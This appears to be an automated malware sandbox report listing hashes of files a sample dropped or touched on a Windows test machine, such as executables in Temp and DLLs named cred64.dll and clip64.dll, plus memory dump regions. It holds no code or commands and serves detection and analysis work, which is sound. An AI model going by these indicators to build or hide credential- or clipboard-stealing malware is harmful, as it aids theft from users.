SHA512 b9d485a90cc61719b6303ee9b7f0ae60cf4768a06bf3407ad61a1f521999f25886c1730d990b913d7a045c84c06331d00cf081712ddd8438167d9d004798bb95

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 8ff0cd4f6e84153d4f7570c74dab7250
SHA1 6de59e042ba1f838fe0d3ed52133c03d8c5207b1
SHA256 790ff5dbbafac87d9e74888858c753b8dbc9d7d8365eb5853c5d52fa27a57328
SHA512 19a0afaceef08c54bb593fd11ce28dba8170ffae717cf763aed2fcac92f82ceaad29caf27c60d504c73773a1e2605eea1aaf7448397e141ae39d1d053f895f27

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d7fd1f2239521a365723430b95342d87
SHA1 1e589564cc1b38f98e2c1a0fda4ca07af0d485bb
SHA256 a5f98cc89035eada405bfbf1c0f4c3f38edc9f431b93c905494f965a3cc7be99
SHA512 fd6c978b26f7df7a0d3740ab083ee2d9c7cb9a3a3c0b3805900e1e81fa838ad14790c8e425e64f478f0211491b2dd5ddae501a865c703564385916acfd112976

memory/6336-329-0x00000000020B0000-0x000000000210A000-memory.dmp

memory/6496-328-0x0000000000330000-0x000000000034E000-memory.dmp

memory/6496-332-0x0000000072DD0000-0x0000000073580000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4174c9f71a1bd89543940550db434c32
SHA1 956d5c0d73f8b645c4adc485bcdff147e9791bb4
SHA256 7dba67e47084ba46bbda4c7f4c2587622fea8b501602109920d83d4b6907fd6e
SHA512 3d97ddf0e3153ce22a496abe1db52246ecca428965dd5a768ec4827445d87782bc26d347bdf014d208a3fa4dc0bf18326d06276fc2ce259052258dd983bce941

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 0377dfbfa3dd6709118f35d1d0c33b71
SHA1 194dcc880ec2a9d7cadd51c27858ef2c3a2f087a
SHA256 b825586482565a13e4b4c004cf87f9e9d5980ba4446ec5f8d0c8acd5720bf632
SHA512 c1376f728d94c86b7785f00bf73982d2d6867d9d6988c58a1f0b13afd4fb249db75f6fd096a05339e12ea1949a3e1d86a0469bad121b816a08fcc794fb3c5c9f

memory/6336-359-0x0000000072DD0000-0x0000000073580000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

memory/6740-362-0x0000000000B40000-0x0000000000B41000-memory.dmp

memory/6496-360-0x0000000004B60000-0x0000000004B70000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 1c706d53e85fb5321a8396d197051531
SHA1 0d92aa8524fb1d47e7ee5d614e58a398c06141a4
SHA256 80c44553381f37e930f1c82a1dc2e77acd7b955ec0dc99d090d5bd6b32c3c932
SHA512 d43867392c553d4afffa45a1b87a74e819964011fb1226ee54e23a98fc63ca80e266730cec6796a2afa435b1ea28aed72c55eae1ae5d31ec778f53be3e2162fc

C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe

MD5 5d0310efbb0ea7ead8624b0335b21b7b
SHA1 88f26343350d7b156e462d6d5c50697ed9d3911c
SHA256 a43f3cf974c02ae797b15d908b0ce1253781e9523a3a5831c199cb4d5dcbda4a
SHA512 ac88ba67e5a88ff99521d7f30c75dffadbb92ef3517eb804713896006f3dc57294742fcf666db5510bd7f43f89d4d11c62b817e31dfd94c2343eced1576be7a7

memory/7068-403-0x0000000002020000-0x0000000002030000-memory.dmp

memory/7068-400-0x00007FFF23C70000-0x00007FFF24731000-memory.dmp

memory/7068-398-0x0000000000090000-0x0000000000098000-memory.dmp

memory/968-404-0x0000000072DD0000-0x0000000073580000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/6336-314-0x0000000000400000-0x0000000000480000-memory.dmp

memory/6336-418-0x0000000000400000-0x0000000000480000-memory.dmp

memory/6336-421-0x0000000072DD0000-0x0000000073580000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 3a7d53caef7aca4e78856af6a6940cf8
SHA1 e6ed8647d526746d13b051bf69eedfea62407dff
SHA256 9e9ddb502ee85e9c94cc0baced80f33cafb6c790bf1d41bea44eaf2f60b227d2
SHA512 ae956b26d7814a0e83503ca7f48b365424bc01b498ac87bd998e52149e801fb608a2e188a3952fb73595489d88ef0513edbb62ab7ea2f71f88592438c632563a

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 0dd544ca4ccb44f6ed5cf12555859eb7
SHA1 f702775542adefab834a1f25d8456bec8b7abfd9
SHA256 7b412527489f5ffedebed690b6ec7252d5b2f4cb75b7e71e3d6eab6e9d0fe98a
SHA512 1cf4e6e9e1d19db819331140aaefefe80d81332ef9eebe8bfe04676e3893acc891b67bb9fd0843d6bfb349e4f683dfb8890c82535d97bf408b78306a6102dfd0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b6278b29f17bb640aab26ebec0a62c0b
SHA1 27de808ec20801993817512f6827ae4e0d29accf
SHA256 c6edc2a22e3a9e9dc883db990cf4f6918c0da97b467c23bf72c8ff64ae5e928b
SHA512 b765b10470d6097f6154d372ef4c697286f8ebfae292870a0581bd8894e63b3cbaedce1235f73a8065aae379c40160038edb0cb9242f7e37062e09558f437fbe

memory/6496-591-0x0000000072DD0000-0x0000000073580000-memory.dmp

memory/6496-607-0x0000000004B60000-0x0000000004B70000-memory.dmp

memory/6740-610-0x0000000000B40000-0x0000000000B41000-memory.dmp

memory/6496-627-0x00000000061A0000-0x0000000006362000-memory.dmp

C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll

MD5 0111e5a2a49918b9c34cbfbf6380f3f3
SHA1 81fc519232c0286f5319b35078ac3bb381311bd4
SHA256 4643d18bb8be79c2e3178bc3978d201c596ab70a347e8cf1e8fdbe3028d69d7c
SHA512 a2aac32a2c5146dd7287d245bfa9424287bfd12a40825f4da7d18204837242c99d4406428f2361e13c2e4f4d68c385de12e98243cf48bf4c6c5a82273c4467a5

memory/6496-642-0x00000000068A0000-0x0000000006DCC000-memory.dmp

memory/7068-648-0x00007FFF23C70000-0x00007FFF24731000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

memory/6496-650-0x0000000006130000-0x0000000006196000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\350690463354

MD5 55095a1e7a42f753281d0996ce55284f
SHA1 c229be998844e92f823ed0a7bd014566327e9c0d
SHA256 1472ffc501ca04524b7008a4175cdb332c1959132b41cd7025b083d96533cbac
SHA512 95538d7105eac3316f4b1b9fed6148b09ba80247791c607baf5b1e5df546db88dd8f4e9a0e896249cf94d5449db8632881f920c6c55c8bf0b0c38ff78461f70e

C:\Users\Admin\AppData\Roaming\aca439ae61e801\clip64.dll

MD5 8da053f9830880089891b615436ae761
SHA1 47d5ed85d9522a08d5df606a8d3c45cb7ddd01f4
SHA256 d5482b48563a2f1774b473862fbd2a1e5033b4c262eee107ef64588e47e1c374
SHA512 69d49817607eced2a16a640eaac5d124aa10f9eeee49c30777c0bc18c9001cd6537c5b675f3a8b40d07e76ec2a0a96e16d1273bfebdce1bf20f80fbd68721b39

memory/7068-662-0x00007FFF23C70000-0x00007FFF24731000-memory.dmp

memory/6840-741-0x0000000000400000-0x0000000000409000-memory.dmp

memory/6840-742-0x0000000000400000-0x0000000000409000-memory.dmp

memory/6676-740-0x0000000000920000-0x0000000000929000-memory.dmp

memory/6676-698-0x0000000000A10000-0x0000000000B10000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp8B44.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmp8B98.tmp

MD5 aeb9754f2b16a25ed0bd9742f00cddf5
SHA1 ef96e9173c3f742c4efbc3d77605b85470115e65
SHA256 df20bc98e43d13f417cd68d31d7550a1febdeaf335230b8a6a91669d3e69d005
SHA512 725662143a3ef985f28e43cc2775e798c8420a6d115fb9506fdfcc283fc67054149e22c6bc0470d1627426c9a33c7174cefd8dc9756bf2f5fc37734d5fcecc75

C:\Users\Admin\AppData\Local\Temp\tmp8C1E.tmp

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

memory/6496-907-0x00000000067E0000-0x0000000006856000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp8C59.tmp

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

C:\Users\Admin\AppData\Local\Temp\tmp8C18.tmp

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

C:\Users\Admin\AppData\Local\Temp\tmp8C02.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

memory/6496-908-0x00000000071F0000-0x000000000720E000-memory.dmp

memory/6936-909-0x00000000029C0000-0x0000000002DBB000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 13ff8d403d90ab99f8b0f389f16fcb9c
SHA1 5a881be37f372d59281f4cb34857bc254204fcd5
SHA256 0262ad80ecea396be90ae6beddab7191a930a20b77a451c92f1c2c914b101936
SHA512 42af0bbaefab9363ba6f0c1c076f81af7316dec4dbc9fc320e0f4e42267b35ce09ab66d0a5317e89411bc9b23ef9a3708318848dba889ce14143aed7f455df80

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5890f0.TMP

MD5 17fd1b90f8807ec6d81271849ce47360
SHA1 a919f1f6c992f665cf7b544f9d622850a98c11ce
SHA256 88d4f3918c24c5ee2c14c649ff87e8a2106e22a87dd582aabc1b21f1f646f224
SHA512 8d41fe1950d59e1e5819a125fd9aa0f865b8dab5393f900360dfb07eeed4cfa9c1cb2fdaf5e6265729b5485050bdcc72c6a859d50558cff3ba5c12f67b28ee07

memory/6936-921-0x0000000002DC0000-0x00000000036AB000-memory.dmp

memory/6936-924-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 4480f5ec26b343b70d4ac69fe74aa461
SHA1 248fa309da55b4bb582adf4a8556ddeac03646e8
SHA256 e58e7e09f34a01b146d5652af69f679ae852e24c9a5147100470eee395c9d076
SHA512 bdc0517e9c3f3fec80ab6a0dd38d43a916e817fb0a6b414e7984d2a5d98df715d4d63710f6b844372b70d5f5e85ecac0a1a24815456bdcc86c46447d71a416b2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58940d.TMP

MD5 37bdbcc2f44c1f08a8cab32e572fecf6
SHA1 0c5ef9665310f52dd3c8902901d42e526a3005fe
SHA256 fcadba35c1be84c8dbbf030fd4e1aa1faae6d8978d85ae21741f1790ebc2e24b
SHA512 6ff74ced7f69a833011b5f6d2bb2eb518cb8c4bb96ab04d6bf19402458116f9078eb1a30f064b7ec4dc852efd3b53a13e442690503e83e5bc1eee61946d5dbd0

memory/3096-970-0x0000000008450000-0x0000000008466000-memory.dmp

memory/6840-971-0x0000000000400000-0x0000000000409000-memory.dmp

memory/5560-1028-0x0000000004960000-0x0000000004996000-memory.dmp

memory/5560-1027-0x0000000004AF0000-0x0000000004B00000-memory.dmp

memory/5560-1026-0x0000000072DD0000-0x0000000073580000-memory.dmp

memory/6936-1029-0x00000000029C0000-0x0000000002DBB000-memory.dmp

memory/5560-1031-0x0000000005130000-0x0000000005758000-memory.dmp

memory/6496-1032-0x0000000072DD0000-0x0000000073580000-memory.dmp

memory/5560-1033-0x0000000005790000-0x00000000057B2000-memory.dmp

memory/5560-1034-0x0000000005830000-0x0000000005896000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w4tbc0vm.odx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5560-1036-0x0000000005910000-0x0000000005C64000-memory.dmp

memory/6936-1045-0x0000000002DC0000-0x00000000036AB000-memory.dmp

memory/5560-1076-0x0000000005FC0000-0x0000000005FDE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\09c78d20-9abe-4c3c-b7fe-7b01b4a3a218\index-dir\the-real-index~RFe58b9f4.TMP

MD5 0b81df42b8e3a68ffb34ee940d4d0757
SHA1 9930ae456434d6ac19dc4aa1b551cdf4adf2452a
SHA256 bea0912206cb6cf41fd1c0b242d791fb36c37c2f7647abf862eae39e3d2c4208
SHA512 3ba7195c7b4c1bcad2f95320f1476c9622b1f8e0f885c7ada296b139d4716b003792ab0bd3eda3369795d29a13200f87a1f9501b100cedec1aea56e40b5ee201

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\09c78d20-9abe-4c3c-b7fe-7b01b4a3a218\index-dir\the-real-index

MD5 97faa3e580c95a8d422932854971f746
SHA1 e10721d0e8ea3482bfd2b3f30cf4acf2790b401d
SHA256 01efb30462d150b64cc81c494b2130b52029d0834e99497bca57183ae428e6e4
SHA512 890b4fbce9ccfb088c2fc6ef0fdfc9a93c9b7af9dc018fb2a7b8c0ae5818e73d260afdc670990a4afeb45f52f1d42a67c50134fd632858c1fd449f6b91d89e8e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 5d9f10b0e2d2809a27b3051bce0aa327
SHA1 babb817354fbd3beb4a575adc5eef3d8a402f3ba
SHA256 ba82e3d428f999b4fd2bfc7012c0eed9e1384e97f7b9774653925a224b105553
SHA512 7f0711c4e8db40228d0b7b8e9746ac1bb09b1c4de9c3116e832deedbf3342c6f6189c62d3c217ae3733d359b5a1b730964be7663765c5614e2d42552e732089e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9dfa87239465d3a8b7e0e94500f2e3b7
SHA1 78d6f2331cbb08db7802cd5941004e1584a28c56
SHA256 9bea8671072b851f9330320f85296f541e451a78e040fad04c1cab5972838d2d
SHA512 7df21366d28a59e2eb6e5444e8afeb54fa9d999154f30e5a930440a4737e1379b6326d48172df774d99eaea655603967a7f43cfc7b123c8f6873af4bf5166a9b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\47ea58fa-ca5b-4662-b879-01237de442f0\index-dir\the-real-index

MD5 8004a134143af154a5bfb35b81328d26
SHA1 168f64142117a57f3f595488074255bc1968d179
SHA256 3d5963779186ddaf5bc2226232c5316896b5dd92cd893d562f24c2f73b027a9b
SHA512 e22d35e80717fac603f7b26367b733e1ee32003faf6b204b9b6b473a2a51d33fdb089f752457831b84baefa1213cdb34323c7ba208206b9c70ed7559bb2dcdd3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\47ea58fa-ca5b-4662-b879-01237de442f0\index-dir\the-real-index~RFe58d59b.TMP

MD5 374f96f94e1b1ecc30129d9477855355
SHA1 e55d8eacafadcf68e480cfe45d20f2bd0e8f8f28
SHA256 e7116012ed782e95e77fd9df3fee6fea1462b587af10faea95fe3e7b8c27c140
SHA512 9f2b80e6478efd698982f12f63e0ce5bf537e7dbce0b3c4ad053d62567f397c5598a4129456b295f2c4b73ee0aec90a95ad6faada08592c9fe190e19e3338ebc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 1594ba36e9611b873b08be080d09f880
SHA1 15bf0c6c380069b1e060e83ff841431174ebf5f2
SHA256 206cdd071055957e318761041673fc30f01d276c4813aa3ff16d6869a94dca68
SHA512 fd0ad95377fbb8e34edefd1ce4162ab076f37d59d284abdeaa2b011db94fa5b0b329b0fee990fa4124f86315393ce59b9256910ccc4fcf7c4c51381f7a6523e5

memory/920-1217-0x00007FF6F28F0000-0x00007FF6F2E91000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 2e5796cc04efa65c425b0b5afa8f67b5
SHA1 7e10d6f92213fdfdd82b45f9f736b16f3482b825
SHA256 9269f71c5102d809670129af2ea8a00667248bdb7963b04112f702efc8ee7dc0
SHA512 c2b6554c2d836741ea4102a5989c114b10dc493db5b2dfbca6109e0c6f5adeb8c4c531e721732f3be9ea8cec994ef867c93d0f9f581efefd876bd56e72be4eb9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 1d229cc0221488691a06cdd318ff9342
SHA1 3df4fcddcaf37cfc2ba426b74fa07dcd4765fd4d
SHA256 16dfe32c6d3ed286ec9e141d14a8b3d3d3187a72a522f0225ef36e5c9b46fead
SHA512 9d890dd8410b8dedc8fc5943daf9498a2da38bf3f08a3a839e48b991d4659c14833a6860076e02084c66ba1ec7e5a347658d9ed62ec8f88c1952e87c8a6b2b79

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 0a0860ca43010524f554f22d0cdcfb23
SHA1 f8aa680b816454164fd0b62e204aea9b784a8af4
SHA256 2f34a1c6707b937216c069d1e6a07b1b18ee9115626eb27ee2e5486ca9b9d7ea
SHA512 cf0caa6d7f5eb9b940518b3bf008288c76d953da42787af9cd3d9c0e0cdee8420ac83035096fa1e577a807e13919014f1643ecd29ebf090720b03346daa028d4

memory/5708-1395-0x0000000000BC0000-0x0000000000BFC000-memory.dmp

memory/7160-1396-0x00007FF791530000-0x00007FF791E96000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a6f7b2ec8ee0370d856a5d57385c1863
SHA1 f099e9985e62022ffd4977e26a6b0e98cc30dba1
SHA256 8f211731345f55a3a6fba8a3dcb1263ea8a6d2ab2fb8d0bf7a44ef3c041e3ada
SHA512 5f64034051886f20f42b0136855cbb7ea6c0486a9e71c73e5c28efbdfbfe871b661bd675d5789c4222cfc450751db68f9cc0b054c2de2337fa285b7ef496d268

memory/6740-1501-0x0000000000400000-0x0000000000965000-memory.dmp

memory/6936-1502-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/6540-1503-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/6464-1504-0x00007FF635A30000-0x00007FF635FD1000-memory.dmp

memory/6480-1505-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 851b75ac3883d544da0fe0aecb139e99
SHA1 ab0fd94cf6138da740ade917317df06539039653
SHA256 f0448c0801e3385f343e32b9bab7335d3e6fdb7f3dfb77913f1282fa9a352b0e
SHA512 6714aa5b5c3bfd16f9a9bee96eb4a500b2f604e942a98d0bad93e948774305730ba8d48a53654dec843862ef7a704d059063ad65656ba0987b6a1b08bc0e598b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\be064a3a-319d-40a5-87cd-11e2ca731195.tmp

MD5 8409f55e7adbc995b0c26473cc800a05
SHA1 a8629854747259d46b7bb012eda25c312ae1d4ce
SHA256 424669f2215abf95a96fdaa53e0ddfc46f051efcfb890464495b6ec20721912d
SHA512 9392ab05b8b32e8bcb260007e6cf6d1c116d1620e41aa46a83c510b5b442b709241a77c6bba365185612aa6d54824579139845ed391ee857cf0204d8a949b0c4

memory/6480-1621-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b97f21cf88548d40f94d0591a6c3ea48
SHA1 091da747e46d2caa64050a2ef0cc566d787f5aac
SHA256 a7948bcc0cbf977d56b749e4b4e6ed38880eef3e5384eb54a08a2a2a320603fe
SHA512 5503ade4f089d7189487998cdde8db1dae3898d0cf851ef083b357a8e7c4cb72d8ab666601d8389778abe5066c687bcd0700f067158b85bb9d12aa268b97f0ed

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

memory/6464-1704-0x00007FF635A30000-0x00007FF635FD1000-memory.dmp

memory/1712-1705-0x0000000000850000-0x0000000000870000-memory.dmp

memory/6740-1706-0x0000000000400000-0x0000000000965000-memory.dmp

memory/6480-1709-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5700-1715-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/6480-1736-0x0000000000400000-0x0000000000D1B000-memory.dmp